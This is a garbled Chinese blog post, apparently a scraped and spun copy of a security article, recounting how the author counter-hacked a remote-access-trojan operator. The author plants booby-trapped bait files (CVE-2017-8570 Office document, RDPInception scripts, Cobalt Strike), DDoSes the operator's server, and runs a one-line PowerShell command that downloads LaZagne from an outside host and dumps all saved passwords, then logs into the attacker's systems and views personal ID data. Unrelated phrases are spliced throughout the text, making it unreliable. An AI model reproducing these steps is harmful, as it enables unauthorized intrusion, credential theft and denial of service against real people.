您当前的位置:网站首页>软中华,看我怎么揪出远控背面的暗地黑手,半壶纱

软中华,看我怎么揪出远控背面的暗地黑手,半壶纱

2019-04-30 11:00:32 投稿作者:admin 围观人数:284 评论人数:0次

*本文原创作者:日理万鸡,本文属FreeBuf原创奖赏方案,未经许可制止转载

001 前语

写这篇文章时,这次的浸透现已完结一周多了,其时也没有想到会要写文章出来,所以有一部截图是后来补又见平遥上的,为了我的人身安全,有涉及到的灵敏信息,我都会打码,请多多包容。

002 作业的原因

最近加了许多信息安全相关的QQ群,不得不说,天津天气预报15天在这些群里边收成颇丰,不过发现几个QQ群友,一向在推行他们的全自动浸透东西,会常常蹦出来什么全自动getshell东西箱、exp批量运用东西、电脑手机长途办理东西等等,还有许多我没听说过的东西,比方下面这些。

层组词

003 发现可疑文件

花了半响时刻,下载了QQ群中大大小小好几款相关的东西剖析了下,要么无法运转,各种报错,但并没有发现什么可疑的点。在预备抛弃的时分,果不其然天津宜兴埠强拆事情,发现一款Xise菜刀,解压需求输入暗码,单就这一点我就觉得很可疑了。

二话不说,拨掉网线,翻开虚拟机,发动火绒剑,运转该可疑程序,用火绒剑监控程序进程、文件拜访、动作、网络衔接、等状况,立刻就发现这个菜刀是被加过料的菜刀,菜刀本身会创立jpg文件到C盘,而且加注册表,创立服务项、还一向反向衔接一个境外IP的1640端口,走TCP流量。

微步一查此IP,被人告发过,确认是老黑泰顺天气预报的远控服务器,而且能ping通,根本确认下来了,是木马远控的监听端口。

花了大约半响的时刻,对这台服务器进行了惯例的浸透,从信息收集、全端口、服务、弱口令、绑定的域名等等惯例的方法进行浸透,或许是由于方针太小,也或许是自己技能太菜、或者是自己时刻太紧等等原因,这台木马远控服务器并没有拿下来,又搞了半响,仍是一无所得。

004 思路扩展

既然是老黑的远控,那他在我的电脑里边种了木马之后,很或许会翻我电脑的各种文件,所以就将计就计吧,那我精心制造一些比较有吸引力的文件吧,放置在我的电软中华,看我怎样揪出远控反面的背地里黑手,半壶纱脑桌面,让老黑都去拿。

所以我在外网建立了CobaltStrike远老树画画打油诗全集控,正式老黑发起了战役。CobaltStrike的建立请参阅:http://suo.im/54mIL9。

005 制造鱼饵

为了能进步老黑电脑的垂钓上线成功率,终究我挑选制造如下几种类型的文件,放置到我的电脑桌面,顺便把我制造的进程共享给兄弟们。

1、制造winrar垂钓压缩包文件

这个其时也没有截图,家里电脑的运转库正好呈现问题,无法复现制造进程了。不过制造仍是很简单的,同学们直接用这个脚本制造就行:201820250

2、结构RDPInception后门,留一台外网VPS

GitHub上也有自动化进犯一个脚本:,但我本地一向没有试验成功,所以自己写了以下三个文件。

powershell.vbs文件放置到我的外网VPS上的:"C:\Users金雪炫\Administrator\AppData\Roaming\M娱乐网注册送彩金icrosoft\Windows\StartMenu\Programs\Startup\powershell.vbs" windows.bat文件放置到我的外网VPS上的:"C:\windows.bat" WindowsMedia.bat文件放置到我的外网VPS上的:"C:\Program Files\WindowsMedia.bat"

powershel红烧狮子头的家常做法l.vbs首要用于躲藏履行,不会呈现黑窗口三个文件的内容如下,用过的人一看就懂了:

预备好后,我刊出了外网这台VPS服务器,由于只要刊出后,被citizen人登录才会触发我的vbs脚本。

3、制造Office文档木马(CVE20178570)

运用了这个脚本:https://github.com/rxwx/CVE20178570

修改了calc文件中的代码为CobaltStrike远控上线代码

制造出来的文件: 大轰炸

4、终究作用

一切的文件、压缩包、里边都是有数据的,做的也不能太假了。下图是放在桌面上的的作用,这些文件都是加过料的后门(写文章时才发现,不知道为什么,用于垂钓的电脑上应用程序图标不能正常显现了)。

鱼饵制造完结,在垂钓机器上运转带木马远控的菜刀,对了,先把电脑上的相关解压野地瓜东西、Office,都卸载掉,这些加过料的文件就无法在我本机上翻开,老黑想要检查,就必须放置到他自己的电脑上解压后才干翻开。

006 DDOS进犯至宕机

预备就绪 就等老黑来上钩。等了两天沈文裕被父亲毁了我的CobaltStrike没有反应,或许也是比较奸刁吧,并没有我幻想的那么顺畅,闲来无事,晚上找了一个压力测验渠道,先把老黑的木马远控服务器打宕机吧。

呵呵,成果才打了不到30秒,服务器就挂了。。。

007 内网电脑上钩

在4月3号,我用于垂钓的外网VPS被异地登录,垂钓很或许成功了。

正午检查下C盘我VPS上的W缝纫机indowsMedia.bat文件,文件现已不在了,看来现已成功植入到老黑的电脑上了。

比及了第二天上午9点半左右,我的CobaltStrike公然有机器上线了。由于文件是复制到方针的Start开机自启目录,需求机器重启才会引起上线,所以或许就到了第软中华,看我怎样揪出远控反面的背地里黑手,半壶纱二天吧。

截个图,检查了下桌面,应该是个做菠菜的团队吧,Skype谈天软件上的人还不少。

仍是为内网环境

好了这个先不论,查询了下Tasklist,个qq经典分组人机器竟然没有发现杀软。

008 运用LaZagne抓取电脑上各种衔接暗码

发现被控的电脑开机时刻并不久,大约也能判别出来,此人下班有关电脑的嘉善习气。

随手就给他加个后门保持吧,为了不操之过急,损坏我的功德,比及中年12点半他去午经典打豆豆休睡觉,我再来软中华,看我怎样揪出远控反面的背地里黑手,半壶纱悄悄作战。

到了正午13:00 点左右,公然计算机还在线。原本想用mimikatz来抓暗码,可是mimikat抓的太少了,只能抓体系暗码,所以我挑选了LaZagne,直接用以下指令一键抓取他的电脑上一切暗码(Wifi、长途桌面、体系暗码、Chrome、长途桌面等等保存的暗码):

(echo powershell "($client = new‐盘龙小说object System.Net.WebC软中华,看我怎样揪出远控反面的背地里黑手,半壶纱lient) ‐and($client.DownloadFile('http://www.huihun.ml/laZagne.exe','wmplaye.exe')) ‐and (exit)") | cmd && wmplaye.exe all

哈哈,今日又是一大波收成,计算上的各种长途服务器的暗码、Chrome网站暗码、其间最重要的木马远控服务器账号暗码悉数搞出来了。

009 成功登上木马远控服务器

运用抓取出来的账号与暗码登录木马远控服务器。老黑本来运用的是DarkCometRAT远控, 上面被控的机器还真不少。

哈哈,此次收成的材料也不少,随意登录其间一些WEB域名办理体系,愈加确认又是一个做菠菜的了,忽然感觉就要发财了,为了人身安全利维坦考虑,其间的域名我就不贴出来了。

在其间的一个体系中,找到了他的身份证实名信息,企业经营履行、我也不知是真仍是假。

010 横向浸透、干内网、告发一波

到这儿关于反向的垂钓就先告一段落,明日要上班作业,今晚预备通宵干他的内网,再告发一波。

011 此次的软中华,看我怎样揪出远控反面的背地里黑手,半壶纱反向垂钓流程

012 总结

本次制造了三种类型的垂钓文件,成果只要一种是成功运用上钩了,并不是我每次定向垂钓都会成功,许多时分都是失利告终的,个人业余玩玩,所以此次的对立并没有什么方针,我仅仅单纯的玩玩,这些都是作业之余抽出来的时刻来做,其实在刚开端的时分,并没有那么顺畅,在制造垂钓文件之初,会呈现许多大大小小的问题,到最后的进犯进程的收拾也花了不少精力,此次垂钓成功,从开端到完毕,大约也花了我半个月时刻左右。但缉获的东西的确也不少。

所以在日常作业还有日子中,同学们仍是要进步安全意识,不要运转、翻开 来历不明的程序、文档、文件,下载的文件很或许就被人绑了木马病毒,并不是一切的杀软都能查杀出来。

在此也规劝那些心胸软中华,看我怎样揪出远控反面的背地里黑手,半壶纱不轨的兄弟们,我们也是成年人了,人在做,天在看,邪不压正,请好自为之。

*本文原创作者:日理万鸡,本文属FreeBuf原创奖赏方案,未经许可制止转载

软中华,看我怎样揪出远控反面的背地里黑手,半壶纱
声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间服务。
the end
无论遇到什么,也依然要快乐,生活态度